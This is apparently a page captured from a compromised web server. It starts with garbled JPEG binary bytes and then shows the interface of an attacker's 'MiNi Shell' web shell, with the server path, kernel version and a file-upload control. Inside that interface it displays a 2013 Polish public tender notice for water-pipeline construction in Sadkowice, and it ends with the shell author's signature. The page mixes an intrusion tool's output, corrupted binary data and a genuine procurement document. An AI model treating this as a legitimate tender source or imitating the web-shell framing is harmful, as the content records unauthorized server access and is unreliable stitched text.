JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130425/166548-N-2013.html

<p class="kh_header"><b>Sadkowice: Budowa wodociągu i przyłączy wodociągowych część kwalifikowalna  Etap I cz.1 i Etap II</b><br>
<b>Numer ogłoszenia: 166548 - 2013; data zamieszczenia: 25.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sadkowice , Sadkowice 129A, 96-206 Sadkowice, woj. łódzkie, tel. 46 8156191, faks 46 8156191.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.gminasadkowice.pl; http://www.gminasadkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wodociągu i przyłączy wodociągowych część kwalifikowalna  Etap I cz.1 i Etap II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Nazwa zamówienia:

Budowa wodociągu i przyłączy wodociągowych część kwalifikowalna

Etap I cz.1 i Etap II

2. Rodzaj zamówienia

   Roboty budowlane

3. Przedmiot zamówienia :

Przedmiotem zamówienia jest budowa sieci wodociągowej Etap I cz. 1- zakres od ujęcia wody do miejscowości Rzymiec obejmujący miejscowości: Studzianki i Gacpary wraz  przyłączami  wodociągowymi - koszty kwalifikowane. Sieci wodociągowej Etap II- zakres od ujęcia wody do m. Zabłocie obejmujący miejscowości: Lewin, Przyłuski, Zabłocie Studzianki wraz z przyłączami wodociągowymi- koszty kwalifikowane 

Wykonanie robót zgodnie z dokumentacją projektową, szczegółową specyfikacją techniczną wykonania i odbioru robót oraz przedmiarami robót.

Sieć wodociągowa została zaprojektowana z  rur wykonanych z polichlorku winylu  PVC PN 10 i PEHD O 160 mm, 110 mm i 90 mm oraz  z armatury  żeliwnej.

 Etap I część 1 w m. Gacpary, Studzianki, - gm. Sadkowice        

Ogólna długość sieci wodociągowej wynosi 4 475 mb

                        z tego:             O 160 mm - 1 339 m

                                               O 110 mm - 2 170 m

                                               O   90 mm -    966 m            

Etap II w m. Lewin, Przyłuski, Zabłocie, Studzianki - gm. Sadkowice

Ogólna długość sieci wodociągowej wynosi 9 616 mb

                        z tego:             O 160 mm -      37 m

                                               O 110 mm - 9 034 m

                                               O   90 mm -    545 m

Rury PVC  kielichowe  w sieci rozdzielczej łączone będą przy pomocy uszczelek  gumowych. Uzbrojenie sieci wodociągowej stanowią zasuwy, które należy obudować płytami betonowymi. Aby uniemożliwić wysunięcie się bosego końca rury  PVC z kielicha, na  wszystkich węzłach tzn. kolanach, zasuwach, zaprojektowano  betonowe bloki oporowe z  betonu lanego, z warunkiem oparcia ich o grunt w stanie rodzimym. Na sieci  zaprojektowano hydranty nadziemne ppoż. w odległościach zgodnych z normą oraz  niezbędne zasuwy sytuowane w punktach węzłowych sieci.

Przyłącza wodociągowe o średnicy wewnętrznej  O 32 mm , 40 mm, 50 mm i 63 mm zostały zaprojektowane  z rur PE

Etap I część 1 w m. Gacpary, Studzianki - gm. Sadkowice

Ogólna długość przyłączy wynosi:   218 m/28 szt.

                        z tego:             O 32 mm -      118 m

                                               O 40 mm -          9 m

O 50 mm -        10 m

                                               O 63 mm -        81 m

Etap II w m. Lewin, Przyłuski, Zabłocie - gm. Sadkowice

            Ogólna długość przyłączy wynosi:   587 m/76 szt.

                        z tego:             O 32 mm -      451 m

                                               O 40 mm -        41 m

                                               O 63 mm -        95 m

Przyłącza wodociągowe na sieci rozdzielczej będą wykonane przy pomocy nawiertek żeliwnych z zaworami.

W celu oznakowania instalacji i uzbrojenia sieci wodociągowej należy: 

- odpowiednimi tabliczkami oznakować uzbrojenie sieci wodociągowej

- tabliczki informacyjne umieścić na trwałych budynkach i na słupkach betonowych przy

  trasie wodociągu

 - wszystkie skrzynki przewidzieć duże i umocnić płytami betonowymi  i oznakować

   tabliczkami

 
Zakres prac objętych niniejszym zamówieniem  został określony  w projekcie wykonawczym, przedmiarach robót, specyfikacji technicznej wykonania i odbioru robót i niniejszej SIWZ.  Przedmiot zamówienia należy wykonać zgodnie z dokumentacją  zatwierdzoną  decyzją  Starosty Rawskiego - pozwoleniem na budowę Nr  495/2010 z dnia 29.12.2010 r., oraz pozwoleniem na budowę Nr  292/2011 z dnia 05.08.2011 r.

Wszelkie prace budowlane oraz inne czynności nie opisane w niniejszej specyfikacji istotnych warunków zamówienia i w załącznikach do niej, a niezbędne do właściwego i kompletnego wykonania przedmiotu zamówienia należy wykonać w ramach niniejszego zadania i uwzględnić w kalkulacji kosztów.

4.  Dodatkowe warunki realizacji przedmiotu zamówienia:

a) Zamówienie będzie współfinansowane w ramach działania 321 Podstawowe usługi dla gospodarki i ludności wiejskiej Program Rozwoju Obszarów Wiejskich na lata 2007 - 2013

b) Wykonawca przed złożeniem oferty cenowej oraz rozpoczęciem robót powinien dokładnie zapoznać się z dokumentacją łącznie z uzgodnieniami (wraz ze sprawdzeniem wszystkich wymiarów danych technicznych w projektach, oraz ilości wymienionych w przedmiarze robót) a także zaleca się dokonania oględzin terenu gdzie będzie realizowana inwestycja, aby w razie stwierdzonych niejasności domagać się od Zamawiającego wyjaśnień;

c) Wykonawca, którego oferta zostanie wybrana,  zobowiązany jest skompletować i złożyć wnioski (zgłoszenia) do zarządcy drogi oraz uzyskać  zezwolenia na prowadzenia robót w pasach drogowych

c) Jeżeli w załącznikach do SIWZ pojawią się ewentualne wskazania znaków towarowych, patentów lub pochodzenia, to określają one minimalny standard jakości materiałów lub urządzeń przyjętych przykładowo do wyceny. Zamawiający dopuszcza zastosowanie produktu innego producenta o parametrach równoważnych lecz nie gorszych niż przyjęto w dokumentacji technicznej.

d) Zamawiający przewiduje płatności dla Wykonawcy po realizacji całego przedmiotu zamówienia,  w ciągu 30 dni licząc od dnia otrzymania przez Zamawiającego prawidłowo wypełnionej faktury, która będzie wystawiona przez Wykonawcę po odbiorze końcowym całego zadania.

Zapłata będzie się odbywała na podstawie jednej faktury. Faktura wystawiona będzie po zrealizowaniu całego zadania.

e) Oferta musi uwzględniać wszystkie koszty związane z prawidłową realizacją zamówienia. Przyjmuje się, że Wykonawca upewnił się co do prawidłowości i kompletności oferty, która powinna pokryć wszystkie jego zobowiązania umowne, a także wszystko to co może być konieczne dla właściwego wykonania  i wykończenia robót oraz usunięcia usterek.

f) Wykonawca dokonuje wszelkich zgłoszeń zajęcia pasa drogowego i pokrywa koszty z tym związane w okresie prowadzenia robót.

g) Wszystkie materiały przewidziane do zastosowania przy realizacji przedmiotowej inwestycji należy zgłosić koordynatorowi inspektorów nadzoru przynajmniej na 2 tygodnie przed wbudowaniem do zatwierdzenia w formie wniosku materiałowego zawierającego deklaracje zgodności oraz dokumenty potwierdzające spełnienie wymagań przewidzianych w dokumentacji projektowej oraz specyfikacjach technicznych.

h) Wykonawca zapewnia wykonanie  inwentaryzacji powykonawczej, która musi być przekazana Zamawiającemu najpóźniej w dniu odbioru końcowego robót.

i)Wykonawca zobowiązany jest również do wykonania zadania zgodnie z wymogami określonymi w dokumentacji formalno-prawnej stanowiącej załącznik Nr 10 do SIWZ.

5. Wymagania stawiane Wykonawcy:

1. Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia.

2. Wymagana jest należyta staranność przy realizacji zobowiązań umowy.

3. Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy.

4. Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia.

5. Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia.

6. Uwagi końcowe:

Szczegółowy zakres robót został określony w dokumentacji projektowej (projekcie wykonawczym), szczegółowej specyfikacji technicznej wykonania i odbioru robót, przedmiarach robót, w niniejszej Specyfikacji Istotnych Warunków Zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.09.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem przystąpienia do przetargu jest wniesienie wadium w wysokości 
40.000,00 PLN (słownie złotych: czterdzieści tysięcy złotych 00/100 PLN). Wadium winno być wniesione w formie określonej w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
Dowód wniesienia wadium należy dołączyć do oferty. Oryginał należy załączyć luzem, a kopię trwale spiąć z ofertą.
W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na konto  BSBR O/Sadkowice nr: 09 9291 0001 0035 8648 2000 0010
z takim wyprzedzeniem, aby środki znajdowały się na koncie Zamawiającego przed otwarciem ofert.
Zwrot, zatrzymanie lub ponowne wniesienie wadium następuje na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony gdy Wykonawca złoży oświadczenie wg wzoru-załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony gdy Wykonawca  udokumentuje, że w  okresie określonym w dziale VI pkt  A4 niniejszej SIWZ Wykonawca należycie wykonał co najmniej 
1 robotę budowlaną o podobnym charakterze (budowa, sieci wodociągowej o długości nie krótszej niż 10km wg wzoru załącznik  nr 3</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli:
Kierownik budowy będzie posiadał uprawnienia do kierowania robotami  instalacyjnymi w zakresie instalacji wodociągowych i kanalizacyjnych 
Kierownik robót branży drogowej będzie posiadał uprawnienia do kierowania robotami  w zakresie budowy dróg na dowód tego Wykonawca składa  Oświadczenie wg wzoru załącznik nr 7 oraz Oświadczenie wg wzoru załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli:
Kierownik budowy będzie posiadał uprawnienia do kierowania robotami  instalacyjnymi w zakresie instalacji wodociągowych i kanalizacyjnych 
Kierownik robót branży drogowej będzie posiadał uprawnienia do kierowania robotami  w zakresie budowy dróg na dowód tego Wykonawca składa  Oświadczenie wg wzoru załącznik nr 7 oraz Oświadczenie wg wzoru załącznik nr 2.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony gdy wykonawca złoży oświadczenie wg wzoru-załącznik nr 2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>6. Zamawiający, zgodnie z art. 144 ustawy Prawo zamówień publicznych, przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:
a) w przypadku zmiany osób wymienionych w § 3  umowy,
b) w przypadku konieczności wykonania robót  zamiennych. Roboty zamienne nie powodują zmiany ceny. Ich konieczność  zostanie potwierdzona wpisem do dziennika budowy przez Kierownika Budowy oraz inspektora nadzoru sprawującego nadzór nad inwestycją.
c) może nastąpić  zmiana okresu przewidzianego na ukończenie robót gdy:
1)    zmiany spowodowane są warunkami atmosferycznymi, w szczególności:
-klęski żywiołowe;
-warunki atmosferyczne odbiegające od typowych, uniemożliwiające prowadzenie robót budowlanych i dokonywanie odbiorów;
2)    zmiany spowodowane są nieprzewidzianymi warunkami realizacji, tj. warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności: wykopaliska archeologiczne, niewypały i niewybuchy, niezinwentaryzowane lub błędnie zinwentaryzowane obiekty budowlane;
3)    zmiany będące następstwem okoliczności leżących po stronie Zamawiającego, w szczególności   wstrzymanie robót przez Zamawiającego.
d) w przypadku rezygnacji przez Zamawiającego z realizacji części przedmiotu umowy;   Zmiany mogą dotyczyć zmniejszenia zakresu wykonywanych prac, i w związku z tym zmniejszenia wynagrodzenia o kwoty odpowiadające cenie robót, z których zamawiający zrezygnował, obliczonych na podst. kosztorysu ofertowego złożonego wraz z ofertą przez Wykonawcę.
e) za względu na konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
f) ze względu na konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.

Zmiany w treści  umowy będą dokonywane wyłącznie w formie pisemnego aneksu.
Wszystkie powyższe postanowienia niniejszego punktu-6 stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.gminasadkowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Sadkowicach, Sadkowice 129A, 96-206 Sadkowice, pok. nr 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.05.2013 godzina 10:00, miejsce: Urząd Gminy w Sadkowicach, Sadkowice 129A, 96-206 Sadkowice, pok. nr 1, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie będzie współfinansowane w ramach działania 321 Podstawowe usługi dla gospodarki i ludności wiejskiej Program Rozwoju Obszarów Wiejskich na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com